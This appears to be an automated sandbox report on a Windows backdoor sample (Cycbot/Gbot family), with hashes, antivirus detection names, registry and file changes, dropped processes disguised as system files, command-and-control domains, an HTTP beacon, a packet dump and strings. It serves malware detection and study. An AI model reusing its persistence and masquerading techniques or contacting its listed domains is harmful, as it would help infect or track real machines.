Analysis Date2015-01-11 19:23:51
MD51d8701160a8c9ff6d2f04adf5077cc8c
SHA154020e0558a979c8656629e001c2f6750dcb2842

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 77c3b9208c2672f8624181157c936223 sha1: ed2ed90906accd4220160cef0821f4594818e367 size: 110592
Section.rdata md5: 2e450bea89111f605115b0b2caa47b4c sha1: 6a1ddf5feca881f37699bcb2d8c018036967c400 size: 512
Section.data md5: 607554a4026cd4a725f5a5a7ec419745 sha1: cff93b48534421372ba83dfc29fbf2be8fc89715 size: 23552
Section.rsrc md5: 13ce672b5038c3b2192d9eb918de70be sha1: 5aa8e64c719143acd54ccec5bdd6c92e58b36159 size: 1024
Timestamp2005-11-27 12:40:53
VersionPrivateBuild: 1393
PEhashd5574c8b3c51e0a08577cc2991dbea7c541d9869
IMPhash8b7405e6c30108cee80707099777964a
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-215682
AVDr. WebTrojan.DownLoader1.45017
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IWX
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.BNC
AVIkarusPacked.Win32.Krap
AVK7Error Scanning File
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Trojan.CB.01205

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSbabyboompage.com
Winsock DNSzonehs.com
Winsock DNSsharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSsharewareconnection.com
Type: A
216.240.159.81
DNSbabyboompage.com
Type: A
DNSxibudific.cn
Type: A
DNSzonehs.com
Type: A
HTTP GEThttp://sharewareconnection.com/images/ubar_0.jpg?tq=gHZutDyMv5rJeTbia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1032 ➝ 216.240.159.81:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 75626172   GET /images/ubar
0x00000010 (00016)   5f302e6a 70673f74 713d6748 5a757444   _0.jpg?tq=gHZutD
0x00000020 (00032)   794d7635 724a6554 62696139 6e726d73   yMv5rJeTbia9nrms
0x00000030 (00048)   6c366769 577a2532 424a5a62 56794125   l6giWz%2BJZbVyA%
0x00000040 (00064)   33442048 5454502f 312e300d 0a436f6e   3D HTTP/1.0..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207368 61726577 61726563   Host: sharewarec
0x00000070 (00112)   6f6e6e65 6374696f 6e2e636f 6d0d0a41   onnection.com..A
0x00000080 (00128)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000090 (00144)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000a0 (00160)   0d0a0d0a                              ....


Strings

040904b0
1393
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
0,D*wP
1}rD#	
,1R;j4
`280.|
"2	M_\
4>Dyd17#
"7,NV,%
8v~U62
AtLK(3e
^c2"cC
cB'j2J
c-BY|$
ccNc=y
_cVV<<St
@;CXX`
@.data
DisableThreadLibraryCalls
EnumResourceNamesW
ExitProcess
-F6as]
FyGGCj
GetCommandLineA
GetCommandLineW
GetStartupInfoA
GlobalDeleteAtom
HeapCreate
HeapDestroy
|$ &hH
hhLoad
hhLoca
)_?j-,
JRichu
KERNEL32.dll
{~kW+~
L[ksG3^
l]Om2N
LresultFromObject
]Lv}<B
lZeQ/2
Mce.X4
mHOmTc
mTe>FcyX
MTy@Rj
!'mzo6
N^_2j]
n.hje&h
nVJL|L
N*_YMx?&
OLEACC.dll
*:)oLx6
p'0	x%
PBl9O0S>
QPe86qe,
Qp;*-S
`.rdata
SetHandleCount
SetLastError
t":2!!
'T!cWU
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
u`1(;{N
u24__1L
Ux6"M*
+?vEEQZ
v &h$L@
v	t9=c
w_3xx'
<W7,l!
w^I,ty
$wQsqH
X4R5%l
Xf6Y9}
XrbxVJ
y2mY:~
y\Oi[q
/yt]6;K
yZn{(S
+Z3(sjA
zc2IhP
*zLKku
,.zXy_